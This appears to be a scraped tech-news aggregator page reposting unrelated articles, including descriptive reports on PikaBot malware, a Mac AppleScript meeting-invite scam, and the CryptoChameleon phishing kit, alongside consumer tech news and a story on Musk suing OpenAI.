PikaBot malware on the rise: What organizations need to know 

andreasc
-
0
PikaBot malware on the rise: What organizations need to know 
[ad_1]

A new type of malware is being used by ransomware gangs in their attacks, and its name is PikaBot.

A relatively new trojan that emerged in early 2023, PikaBot is the apparent successor to the infamous QakBot (QBot) trojan that was shut down in August 2023. QBot was used by many ransomware gangs in the past for its versatile ability to facilitate initial access and deliver secondary payloads.

After QBot got shut down, there was a vacuum in the ransomware gang tool box—but with PikaBot, that’s beginning to change: last month we wrote about the first recorded instance of PikaBot being used by ransomware gangs, specifically Black Basta, in their attacks.

Let’s dig into how PikaBot works, how it’s distributed, how ransomware gangs use it in their attacks, and how to stop it with ThreatDown.

A closer look at PikaBot

To get a better idea of how PikaBot works, we need to first understand what a modular trojan is.

Simply put, a modular trojan is a type of malware designed to be flexible and extensible, allowing attackers to add or update its functionalities easily without needing to replace the whole malware.

The modular nature of trojans like QBot and PikaBot are what makes them so dangerous. Unlike simpler malware, PikaBot can execute arbitrary commands, download additional payloads, and inject malicious shellcode into legitimate processes running on a victim’s computer. Think of it like a backdoor that allows attackers to set up for the next stages of their attacks.

Once it’s installed onto a system, PikaBot has a whole host of ways to stay under the radar, evading detection by most conventional security tools through techniques like indirect system calls and advanced obfuscation methods.

How Pikabot is distributed

The distribution of PikaBot, like many other malicious loaders such as QBot and DarkGate, is heavily reliant on email spam campaigns. Even so, ThreatDown Intelligence researchers have seen PikaBot being delivered via malicious search ads as well (also known as “malvertising”).

PikaBot’s initial access campaigns are meticulously crafted, utilizing geolocalized spam emails that target specific countries. The emails often contain links to external SMB (Server Message Block) shares, which host malicious zip files.

SMB shares are network folders leveraging the SMB protocol—a network file sharing protocol designed for sharing files and printers across devices on a network. Attackers often use SMB shares to distribute malware. In this case, downloading and opening the hosted zip file results in PikaBot infection.

For example, consider the below phishing email containing a link to a zip file containing the PikaBot payload.

Source: ANY.RUN (Translation: I sent you some paperwork the other day. Did you get it?)

Once the recipient interacts with these emails by clicking on the link, they are taken to the SMB share hosting the malicious zip files.

Extracting a zip and double-clicking on the executable within it will install PikaBot.

Source: ANY.RUN

How ransomware gangs use PikaBot

Ransomware gangs commonly use modular trojans like PikaBot for their attacks.

Before it was shut down, for example, Qbot allowed ransomware gangs to seamlessly integrate various attack techniques into their operations, including stealing credentials, moving laterally across networks, and ultimately deploying ransomware or other malicious payloads.

PikaBot is being used by ransomware attackers in a similar way.

Once PikaBot has established a foothold in a network, it allows attackers to engage in a wide range of follow-up activities.

For example, researchers have noted affiliates of the BlackBasta ransomware gang using PikaBot to use encrypted communications with command and control (C&C) servers. Pikabot can also assist gangs in getting detailed information about infected systems, helping them tailor their ransomware for maximum impact.

How to stop PikaBot with ThreatDown

Besides preventing initial access through things such as a web content filter and phishing training, choosing an Endpoint Detection and Response (EDR) platform that automatically detects and quarantines threats like PikaBot is crucial.

However, given the constant evolution of malware, identifying dynamic threats like Pikabot boils down to two words: threat hunting.

At ThreatDown, we talk a lot about the importance of threat hunting for SMBs—and not for no good reason, either. Just consider the fact that, when an attacker breaches a network, they don’t attack right away. The median amount of time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like PikaBot that can quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

For example, as detailed in one case study, the ThreatDown Managed Detection and Response (MDR) team employed threat hunting techniques to uncover and neutralize a sophisticated QBot attack on a reputable oil and gas company. The team’s approach involved meticulously examining Indicators of Compromise (IoCs), analyzing network traffic, and scrutinizing unusual patterns of behavior within the company’s IT infrastructure, ultimately resulting in Qbot’s discovery on the network and isolation of infected systems.

ThreatDown MDR workflow

Stop threats like PikaBot today

Want to learn more about how ThreatDown stops new threats like PikaBot? Fill out this form to speak with an expert and get a custom quote.


[ad_2]
Source link

Watching videos on Google Drive is going to be much faster

andreasc
-
0
Watching videos on Google Drive is going to be much faster
[ad_1]

If you are a Google Drive user, then you’ve likely tried to stream some of your saved videos using the platform. Well, using Google Drive to stream videos hasn’t been the best. Fortunately, Google Drive will use the DASH protocol when screaming videos, so the experience will be much better.

When streaming videos on Google Drive, the video player doesn’t take into account how fast or slow your internet connection is. This means that you will experience a lot of buffering if your connection isn’t the greatest. Video streaming platforms like YouTube, on the other hand, will raise or lower the resolution based on your connection speed. This is one thing that helps keep the streaming experience smooth.

  Google Drive will use the DASH protocol for streaming videos

If you are confused about what DASH is, it stands for Dynamic Adaptive Streaming over HTTP. This will automatically adjust the bit rate of the video you’re watching so that it can play better no matter how weak your connection is. Also, videos will start faster when you open them.

The introduction of DASH will make watching videos on Google Drive a much more streamlined experience. Google will enable DASH for new videos going forward. As for videos that already exist on the platform, it’ll be a while before you see DASH make it to them. Google plans to update existing videos on Drive by the end of the year. So, that’s 10 months we will have to wait.

Simplified navigation

Finding different content types on Google Drive is about to change a bit for the mobile app. Normally, when you are searching for files using the search bar, you will see a horizontally scrolling carousel of chips right under the search bar. These chips would all be specific types of files like documents, PDFs, images and videos, Etc.

Well, in a future update, Google will move all of those file types into a drop-down menu. So, when you are in the search section, you will see three drop-down menus where the chips used to be. There will be three drop-down menus. The first one is called “Type,” and it will show you all of the different document types. The second one is called “People,” and it will show you all of the contacts you’ve communicated with on Drive. The last drop-down menu is called “Modified,” and it will show you your most recently modified files.

Google Drive file type drop down

Google is currently rolling these features out to Drive, so you should expect them within the coming weeks.


[ad_2]
Source link

Why European engineering requires unique maintenance techniques

andreasc
-
0
Why European engineering requires unique maintenance techniques
[ad_1]

European engineering is known for its precision and innovation, but it also requires specific maintenance routines. In the case of maintaining European cars, generic ways might not work well. In this blog post, we will take a closer look at the special maintenance methods European engineering needs.

Where Germanic auto design meets Italian craftsmanship, every European brand imposes a unique maintenance task. An European auto repair shop that focuses on European vehicles should have in-depth knowledge and equipment to meet these expectations.

Let’s take a tour of the European engineering world and why your auto repair shop must be fully equipped with the right skills to deal with these super machines.

Understanding European Engineering

The engineering in Europe is distinctive for its careful approach to details, consistent adherence to the design principles, and high standards of quality. It can either be the German automotive engineering that is famous for its precision and performance or the Swiss watchmaking that is highly regarded for its craftsmanship and precision. Both of them are identified with quality and reliability.

Unique Maintenance Challenges

Advanced Technology

European products, frequently being high-tech and complicated, require highly specialized knowledge and tools to maintain and repair. In the automotive industry, advanced electronic control units and high precision machinery used in manufacturing require workers to be updated with the latest developments in order to conduct maintenance effectively.

Precision Engineering

European engineering gives more emphasis on the design and manufacturing of parts with high precision, resulting in finely engineered components that need special attention. From high-tolerance engine parts to complexly calibrated sensors, these precision-engineered components might need to be dealt with carefully and even with great skill.

Specialized Materials

In order to ensure the competitiveness of European products on the market, these materials offer excellent performance, durability and low weight. Special maintenance procedures are required to ensure that these materials are used reliably and that they remain in service. Understanding the properties of these materials, whether it is selecting a suitable lubricant for titanium components or providing carbon fiber body panels with an appropriate cleaning solution, are essential to their efficient maintenance.

Optimizing Performance

In Europe, the emphasis is placed on performance oriented design that can range from very high horsepower in sports cars to maximum accuracy of cutting machines. The ideal level of performance shall be continuously maintained by calibration, modification and adjustment in order to ensure that the machine operates as it should.

Effective Maintenance Strategies

Specialized Training

Technicians should be given specialized training in European engineering principles and technologies to guarantee their efficiency. Contents of the training courses should include the following components: advanced diagnostics, usage of special tools, and maintenance procedures that are specific to European-made products.

Access to OEM Resources

Networking with OEMs gives an opportunity to use technical documents, training materials, and specialized tools required for maintenance of products manufactured in Europe. OEM support lets technicians have access to the recent information and resources that are necessary for efficient maintenance and repairs.

Diagnostic Equipment

Investing in diagnostic equipment made for performing detailed diagnoses on European-made products considerably reduces the technician’s time it takes to identify the issues and perform the required diagnostic work. Recently, the utilization of the diagnostic tools like scan tools, oscilloscopes, and diagnostic software has become an essential part of the troubleshooting of the modern electronic systems and revealing of the hidden faults.

Preventive Maintenance Programs

Creating the preventive maintenance programs that are specifically tuned to the European-made product types reduces the likelihood of the unexpected failures and costly downtime. Scheduled inspections, fluid changes, and component replacements based on manufacturers recommendations are to be taken in order to have desirable and reliable performance.

Genuine Parts and Fluids

Using OEM (Original Equipment Manufacturer) parts and liquids as per the manufacturer’s specifications guarantees compatibility and performance consistency. Performance and reliability of European-made products are dependent on the criteria that they are engineered to meet.

Aftermarket components or fluids can alter the specifications, and thus void warranty. Using original components and fluids guarantees the integrity of the equipment and its service life.

Future Trends in European Engineering Maintenance

– The use of AI and machine learning for predictive maintenance.
– Adoption of digital twins and IoT devices for the purpose of real-time monitoring.
– Greater attention to sustainability for energy efficiency and waste minimization.
– Collaboration between engineers, data scientists, and maintenance professionals for new ideas.
– Shifting to reactive, data-driven maintenance strategies for efficiency, sustainability and global competitiveness.

Conclusion

Innovation, accuracy, and efficiency of European engineering are the highest in a broad spectrum of industries. Therefore, it requires a more detailed approach given the advanced technology, precise engineering, and specialized materials. The innovations aim at optimizing operations and reducing downtime, which in the end benefits an auto repair shop.

Through the knowledge of the specific maintenance problems that are inherent in European engineering businesses are able to effectively implement maintenance strategies and ensure that their European produced products operate optimally for a long time.


[ad_2]
Source link

Malicious meeting invite fix targets Mac users

andreasc
-
0
Malicious meeting invite fix targets Mac users
[ad_1]

Cybercriminals are targeting Mac users interested in cryptocurrency opportunities with fake calendar invites. During the attacks the criminals will send a link supposedly to add a meeting to the target’s calendar. In reality the link runs a script to install Mac malware on the target’s machine.

Cybersecurity expert Brian Krebs investigated and flagged the issue.

Scammers, impersonating cryptocurrency investors, are active on Telegram channels to get interested people to attend a meeting about a future partnership.

One of those investors called Signum Capital tweeted a warning on X in January that one of their team members was being impersonated on Telegram and sending out invites by direct message (DM).

The criminals reach out to targets by DM on Telegram and ask if they have an interest in hearing more about the opportunity in a call or meeting. If they show interest they will be sent a fabricated invitation for a meeting. When the times comes to join the meeting the invitation link doesn’t work. The scammers tell the victim it’s a known issue, caused by a regional access restriction, which can be solved by running a script.

We asked Malwarebytes Director of Core Technology and resident Apple expert Thomas Reed to look at this method. This isn’t the first time criminals have used scripts to compromise users, he told us.

“AppleScript has been used against Mac users with moderate frequency by malware creators over the years. It has the advantage of being very easy to write, and if compiled, is also extremely difficult to reverse engineer.”

According to Reed, AppleScripts can be provided in a few different forms. One is a simple .scpt file that opens in Apple’s Script Editor app. This has a few drawbacks for criminals: A victim would need to click something within Script Editor to run the script, and they would able to see the code, which might be a problem because AppleScript tends to be more human readable than most other scripts. However, there are ways to obfuscate what the code is doing, and many users won’t bother to read it anyway.

Another option is an AppleScript applet. This is something that acts like a normal Mac app. It contains a basic AppleScript executable and the script to be run. In this form, the script can be code signed, notarized, given an icon, and otherwise made to appear more trustworthy. The code could be pretty bland, and unlikely to trigger any kind of detection from Apple’s notarization process, but could download and execute something less trustworthy.

Scripts have another advantage for criminals, Reed warned.

“AppleScripts also have the advantage of being able to very easily get administrator permissions.”

A script that attempts to run a command with administrator privileges will ask users to authenticate, triggering a password dialog.

If the user enters their password, the script doesn’t actually get to see it, but everything else the script attempts to do “with administrator privileges” will successfully run as root without further authentication. This makes it very easy for the script to show a standard authentication request dialog and trick the user into giving root permissions.

“So, in summary, AppleScript can be quite effective for writing malware. In fact, some malware has been written exclusively – or almost exclusively – in AppleScript, such as OSX.DubRobber or OSX.OSAMiner.”

In this case, the script was a simple Apple Script that downloaded and executed a macOS-oriented Trojan. The nature of the Trojan is unknown, but it certainly won’t surprise anyone if it turns out it was a banking Trojan that specializes in stealing cryptocurrencies.

Recognizing the scam

To avoid falling victim to these scammers, it’s good to know a few of their tactics.

  • Targets are approached by DM on Telegram.
  • Topics are cryptocurrency investment opportunities.
  • The scammers have a preference for the Calendly scheduling platform.
  • A fake “regional access restriction” creates a sense of last minute urgency.
  • The script had the .scpt (Apple script) extension.
  • The script was hosted on a domain that pretended to be a meeting support site.

The presence of Mac malware is unfortunately still underestimated, but you can find protection by Malwarebytes for Mac and protect Mac endpoints in your environment by ThreatDown solutions.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.


[ad_2]
Source link

WhatsApp could add icons to the three-dot menu

andreasc
-
0
WhatsApp could add icons to the three-dot menu
[ad_1]

When it comes to app UI design, sometimes, it’s the little things that really enhance the experience. According to a new report, it appears that one of the most popular messaging apps might actually make using it a little bit easier. After news of testing third-party chats, WhatsApp could add icons to the three-dot menu in the near future.

Since we’re talking about a feature discovered in the WhatsApp beta, you will want to take this news with a grain of salt. The company is currently testing this new addition, but it’s not a guarantee that it will push it to the masses. However, since this feature is a very small addition to the interface, it seems likely that WhatsApp will follow through and push this feature.

WhatsApp could add icons to the three-dot menu

When you are using WhatsApp, and you tap on the three-dot menu at the top right-hand corner of the screen when in a chat, you’ll see the overflow menu. If you are a veteran WhatsApp user, then you’ve seen this menu a thousand times. It should be pretty intuitive for you.

However, the company wants to make it even more intuitive. As discovered in the latest beta version of the app version 2.24.5.19 of the Android beta, the three-dot menu could have little icons next to all of the items.

In the screenshot below, we see the View Contact, Report, Block, Search, Unmute Notifications, and Disappearing Messages in the three-dot menu. Each of these items has a little icon next to it. It’s nothing spectacular, but it does add a nice little visual flair to the interface.

WhatsApp icons three dot menu

As for when we should expect to see this feature roll out to the masses, that’s anyone’s guess. Since this is a pretty minor change, we should hopefully see it rather soon. If you have the latest version of the app, you might see it. However, that’s not a guarantee that you will. If you don’t see it, then you’re going to have to wait like the rest of us


[ad_2]
Source link

March 2024 Windows 11 update brings some major improvements

andreasc
-
0
March 2024 Windows 11 update brings some major improvements
[ad_1]

Microsoft is rolling out a slew of new features to Windows 11 with the March 2024 update, including improved Copilot, Widgets, and more. This means that as soon as you install the new update, you’ll get access to support for plugins which was for a long time exclusive to Copilot web. Plus, a bunch load of more features are landing.

Windows 11 is smarter than ever, thanks to improvements in Copilot and others

Before you move ahead, ensure that automatic updates are enabled by default in Windows’ Update settings. Most features should be available with the March 2024 optional non-security preview release update for Windows 11.

First up, Copilot is getting smarter. You can control more settings directly from Copilot, like toggling battery saver mode or other features. Plus, Copilot can show you available Wi-Fi networks and help manage storage space.

The built-in Photos app is getting a boost with a new Generative Erase feature. Say goodbye to unwanted objects in your photos with just a few clicks. Clipchamp, Microsoft’s video editor, is also leveling up with a tool to remove those awkward silences from your videos.

Widgets are getting some love too. You can now disable the pesky “Microsoft Start” feed. For reference, you could push a Google News plugin in the Widgets board to fetch news content instead of relying on the default option.

For multitaskers, Snap layouts are getting smarter. Windows 11 will remember your frequently used apps and suggest layouts for you, making it easier to organize your workspace.

If you’re a fan of Windows-powered tablets with styluses, you’ll love the new ability to write directly into text boxes across the OS. It works across apps such as Photos, Paint, WhatsApp and others. You may expect more apps to support this with future updates.

Casting features are also getting refined, with notifications for casting suggestions and smoother connections with nearby displays. Moreover, sharing content between devices could be a smoother and faster process with more updates to Phone Link. It now lets you access photos and even use your phone as a webcam, similar to Mac setups.


[ad_2]
Source link

How Static Proxies Transform Online Experience

andreasc
-
0
How Static Proxies Transform Online Experience
[ad_1]

Just as surfing the web is better with a stable internet connection, completing tasks like web scraping or bulk purchasing is more efficient with a static IP address. But before you rush to buy static proxies, you should know how exactly they improve your tasks.

You are not better off with a static IP in every scenario. This article will explain how they work, why it matters for proxies, and when you should choose them. Let’s start with some basics.

Static and dynamic IPs

IP addresses are unique identifiers that signal who you are for each web server in contact. The abbreviation IP stands for the Internet Protocol. Simply put, it’s a set of rules that govern how online communications are handled. As per these rules, each device on the internet must have an IP address.

Smartphones, tablets, Laptops, TVs, routers, and even smart fridges have an IP address. A private IP address such as this one – 192.0.2.1 (IPv4) might be assigned by your network router to a device connecting online through it. However, IP addresses, especially public ones, might also include letters with the newest IPv6 standard.

Naming conventions aside, the most important distinction for us here is between static and dynamic IP addresses.

  • A static IP address does not change and is assigned to a specific device permanently. Multiple network sessions can be done with the same IP address without changing.
  • Best for: Static IPs are great for hosting websites, remote access points, or other advanced web applications. They are usually faster when downloading or uploading large data packets.
  • A dynamic IP address changes over time. It can happen due to the network router assigning a different address each time you connect or the service provider switching IPs to optimize performance. 
  • Best for: Since the IP changes, tracking or infiltrating such a home network is more difficult. Dynamic IPs also do not require much configuration or know-how from the user. In most cases, it’s done automatically by the Dynamic Host Configuration Protocol (DHCP) server.

Both types of IP addresses show your approximate location, but dynamic ones vary the IPs with ones from the same approximate location. That’s why static IPs are more accurate for location targeting. Web servers can pinpoint your location better when you connect from the same IP each time. These differences are crucial for running proxy servers.

Why does IP type matter for proxies?

Proxy servers are devices configured to act as intermediaries between the internet and other devices. For example, if you set up a device in Germany to act as your proxy, you could use its IP address and location to connect from Germany.

Of course, setting up a proxy device to route your internet requests requires a lot of resources and know-how. It’s easier to simply purchase it from a provider that can offer a proxy type suitable for you. The main proxy types are distinguished by IP address source.

  • Residential proxies Residential proxies are sourced from ordinary homes. In most cases, providers pay people to run software that enables their devices (laptops, for example) to act as a proxy getaway for others. It’s a type that will arouse the least suspicion from web servers, albeit it can be slow at times.
  • Mobile proxies Mobile proxies are sourced from devices that use mobile internet. Smartphones, tablets, or other similar devices are used to connect to the internet and run software, allowing them to act as proxy servers. Mobile connections may not be fast, but they are often the only option to access mobile-specific services.
  • Datacenter proxies – Datacenter proxies stand out for their affordability and performance capabilities. Unlike the other two types, they are created in special data centers that use commercial internet and professional equipment. One good server can host hundreds of data centre IPs virtually, which is the source of their benefits, but also makes it vulnerable to IP blocks and other restrictions.

Each of these proxy types changes their functioning when used as static or as dynamic. Mobile proxies are rarely static. To ensure support for devices on the move, mobile internet providers use dynamic IPs, so mobile proxy infrastructure cannot hold such IPs unchanging for a long time.

Residential IPs are best when used as static proxies. Since good residential connection is difficult to get by, you will likely want your IP address to stay for as long as you want. Providers usually sell them as such or, at least, provide an option for sticky sessions to hold one IP for longer.

Dynamic residential proxies aren’t the best choice because you are likely to lose a lot of performance. Household connection is simply fast enough to cover for the loss of speed when changing IP addresses.

Datacenter proxies, being much faster, are better than dynamic (also called rotating) proxies. Changing datacenter IPs frequently is proven to improve their legitimacy and help avoid IP bans. Only in rare cases, you might need a static data centre IP, but a static residential IP can transform how you use the internet.

Static proxies: top use cases

  • Browsing the internet anonymously is easy with static proxies. You only need to enter your proxy credentials in your operating system or web browser. Using one IP for a longer period ensures smooth performance and fewer suspicions from web servers.
  • Bulk purchasing might require you to keep one IP address for a longer period. Static proxies will enable you to keep the same IP address throughout the entire checkout process. 
  • Web scraping is a process of collecting online data automatically with bots. While dynamic proxies are used here as well, static proxies may be necessary to ensure a stable connection with the target server.

Wrapping up

Although static IP addresses might be easier to track, sometimes you want to shield your identity consistently. Static residential proxies are best for such a purpose. From simple anonymous browsing to advanced web scraping projects, static proxies will transform how you use the internet.

  1. Tools for Testing Your Proxy Servers
  2. Proxy or VPN for Netflix – Which is Best?
  3. Can You Secure Your Smartphone with a Proxy?
  4. Almost Every Major Free VPN Service is a Glorified Data Farm
  5. What is Dark Web, Search Engines, What Not to Do on Dark Web

[ad_2]
Source link

The Google Play Store is getting a new design for its bottom sheet

andreasc
-
0
The Google Play Store is getting a new design for its bottom sheet
[ad_1]

The Google Play Store has a pretty modern look that’s consistent with Google’s design language. However, there are still a few elements of the UI that could use an update. Well, according to a new report, the bottom sheet in the Google Play Store will get a new design.

This revamp comes right after the same was done for Google Maps. Currently, if you try to install an app from the discovery feed or if you are prompted to update an app, you will see a little panel slide up from the bottom of the screen. This is the bottom sheet, and it gives you a few quick options that you can perform right then and there.

The bottom sheet UI doesn’t quite reflect the most modern Material You aesthetic. Sure, it has rounded buttons, but the corners of the panel itself are still flat, which is something that Google is looking to change with its apps. The rounded corners are in, and they’re what Google wants for its ecosystem of apps.

Google Play Store is getting a revamp of its bottom sheet

Right now, Google is in the process of changing up the way its bottom sheet looks. This is going to give it a more modern look. Looking at the screenshots below, we see that the panel will have larger buttons. Also, the corners of the panel will be very rounded. Lastly, you will see a little bar at the top of the sheet that will let you drag it up to have it fill the screen. To get rid of it, you would swipe downward.

This was discovered in Google Play Store version 39.8. However, the latest stable version of the Google Play Store is version 39.7. So, it’s going to be a little wait before this change makes it to the public. When it arrives, it will make using the Google Play Store a little bit better.


[ad_2]
Source link

Elon Musk is suing OpenAI for not developing ‘Open’ AI

andreasc
-
0
Elon Musk is suing OpenAI for not developing ‘Open’ AI
[ad_1]

Elon Musk is in the process of suing OpenAI because he believes that the company is not living up to the philosophy of developing open artificial intelligence for humanity. In the case, he marked the company CEO Sam Altman and President Gregory Brockman as defendants. While Microsoft has been mentioned a lot in the case, the company was not indicated as a defendant.

Why is Elon Musk suing OpenAI?

This case came a little bit out of left field. You would expect Elon Musk to sue OpenAI if the company was scraping data from X or if ChatGPT generated mean comments about the billionaire. However, that’s not the case. In fact, it appears that Musk is suing OpenAI for being closed off. He believes that OpenAI’s original vision was to craft open-source artificial intelligence for the betterment of humanity. He claims that OpenAI’s current state constitutes a breach of contract, breach of fiduciary duties, and unfair business practices.

“OpenAI, Inc. has been transformed into a closed-source de facto subsidiary of the largest technology company in the world: Microsoft,” Elon Musk says in his suit, “Under its new board, it is not just developing but is actually refining an AGI to maximize profits for Microsoft, rather than for the benefit of humanity.”

Even though Microsoft is not a defendant, the company is brought up a lot. Musk brings into question OpenAI’s true motives for developing artificial intelligence. He says that, rather than being an open-source non-profit company developing AI technology for humanity, it’s basically become a company developing AI just to line Microsoft’s pockets.

Microsoft’s role

A big part of the case has to do with Microsoft’s influence over OpenAI. Microsoft is one of the biggest companies in the world. Elon Musk claims that Microsoft’s motives are only to maximize profits. He feels that this has skewed OpenAI’s endeavors. So, instead of developing artificial intelligence tools to help push humanity forward, the company is, allegedly, being pushed to be a profit machine for Microsoft.

The company has an observer seat on OpenAI’s nonprofit board. While the company does have a seat on the board, Microsoft does not have any control over company decisions. Also, Microsoft gained exclusive rights to OpenAI’s GPT-3 technology back in 2020, a full two years before the generative AI explosion.

The board

In the suit, one thing that Elon Musk brings up is the fact that the current non-profit board members are no longer scientists. Up until late last year, OpenAI’s nonprofit board consisted of AI researchers and scientists. However, the board was replaced after the firing and subsequent rehiring of Sam Altman in November 2023. Musk says that the board members now consist of people who are driven by profit rather than the development of AI technology for all.

Musk says, “OpenAI, Inc.’s once carefully crafted non-profit structure was replaced by a purely profit-driven CEO and a Board with inferior technical expertise in AGI and AI public policy. The board now has an observer seat reserved solely for Microsoft,”

OpenAI isn’t so “Open”

Another thing that Elon Musk complains about is the fact that OpenAI isn’t developing open-source artificial intelligence. Rather, the code powering ChatGPT is behind closed doors known only to OpenAI. He also says that Microsoft could also have insight into OpenAI’s internal details as well. In the case, Elon Musk wants OpenAI to make its source code public. So, if Elon Musk ends up winning the case, that could be a possibility. Suddenly making its code open source would be a huge ask for open AI. Also, if that were to happen, we’re pretty certain that both companies, OpenAI and Microsoft, would push back hard.

Details are still scarce

This lawsuit was filed on Friday, March 1st, so it’s still fresh. We’re not sure if Musk will be able to take this to court. As of now, neither Elon Musk nor OpenAI have commented on the lawsuit.


[ad_2]
Source link

CryptoChameleon Phishing Scam Targets Crypto Users and FCC Employees

andreasc
-
0
CryptoChameleon Phishing Scam Targets Crypto Users and FCC Employees
[ad_1]

So far, the CryptoChameleon phishing scam has successfully phished over 100 victims, with many still active.

Lookout has discovered a multi-pronged phishing campaign, dubbed “CryptoChameleon,” that mimics legitimate login pages for cryptocurrency platforms and the Federal Communications Commission (FCC) via mobile devices.

The kit uses carbon copies of SSO pages and phishing via email, SMS, and voice to trick victims into sharing sensitive information, including usernames, passwords, password reset URLs, and photo IDs, mainly targeting US-based users. 

Researchers detected the suspicious phishing kit when they found a suspicious new domain registration, fcc-oktacom. The phishing kit targets cryptocurrency platforms and SSO services and can impersonate various company brands, with Coinbase being the most frequently targeted service. Researchers identified other websites using the kit, with most using a subdomain of official-servercom as their C2.

The attack as reported by Lookout in its blog post, has successfully phished over 100 victims, with many still active. Notable files in the kit include the C2 server URL, client-side logic, and style sheets. Cybercriminals use RetnNet hosting for most sites.

Victims have to first complete a captcha using hCaptcha, which prevents automated analysis tools from identifying the site and creates a sense of credibility for the site. Once done, a login page mimicking the FCC’s official Okta page is launched, where victims enter their credentials and wait for a login or MFA token. 

The attacker monitors this page via an administrative console and can select where to send the victim’s information. They try to log in using the victim’s credentials in real-time and redirect them to the appropriate page based on the requested information from the MFA service. 

The phishing page could be customized by providing the victim’s phone number and choosing between a 6- or 7-digit code. The phishing kit targets cryptocurrency platforms and SSO services, impersonating various company brands, with Coinbase being the most frequently targeted service. 

Additionally, victims are lured through phone calls, emails, and text messages, while phishing emails are disguised as legitimate messages from cryptocurrency platforms or the FCC containing malicious links, while SMS messages resemble legitimate notifications.

Furthermore, Voice phishing involves impersonating representatives to trick victims into revealing confidential information over the phone. Most legitimate victim data came from iOS and Android devices, indicating the attack is primarily targeted at mobile devices. 

CryptoChameleon Phishing Scam Targets Crypto Users and FCC Employees
A phishing page masquerading as the FCC, along with a malicious text message containing a phishing link, was discovered by attackers, (Credit: Lookout)

Researchers suspect that Scattered Spider could be behind this attack because Scattered Spire also impersonates Okta, registers domains using companyname-okta.com, and homoglyph swapping. However, the phishing kit has significantly different capabilities and C2 infrastructure.

CryptoChameleon is a unique phishing campaign that targets multiple devices, mimics genuine login pages, and uses advanced techniques like hCaptcha to bypass detection tools and enhance the legitimacy of their websites, making them difficult to distinguish from legitimate ones.

Researchers suggest users be cautious with unsolicited messages, verify the source of messages, and avoid sharing sensitive information online. Moreover, users must use strong, unique passwords, and stay informed on the latest phishing tactics and best practices for online security.

Experts Opinion

For insights, we reached out to Jason Soroko, Senior Vice President of Product at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM) who stressed moving from traditional login and password and providing cybersecurity training and social engineering to employees.

“Neither the usage of fake login screens nor lookalike domain names is novel, however, each of these techniques is effective in harvesting username and password credentials. What security teams should be doing is getting away from username and password authentication. If this isn’t possible, we have to go back to fundamental training in social engineering.”

“We have been taught not to open attachments in emails that have specific characteristics, however, people also need to be taught to scrutinize the domains of websites they are entering credentials into. Ideally, we must get away from weak forms of authentication that can be harvested this way,” Jason advised.

  1. EvilProxy Phishing Kit Hits 100+ Firms, Bypasses MFA
  2. Russian Hackers Employ Telekopye Toolkit in Phishing Attacks
  3. NPM Typosquatting Deploys r77 Rootkit via Legitimate Package
  4. Storm-1283 Sent 927K Phishing Emails with Malicious OAuth Apps
  5. Telekopye Toolkit Used as Telegram Bot to Scam Marketplace Users

[ad_2]
Source link
1...362363364...1,476Page 363 of 1,476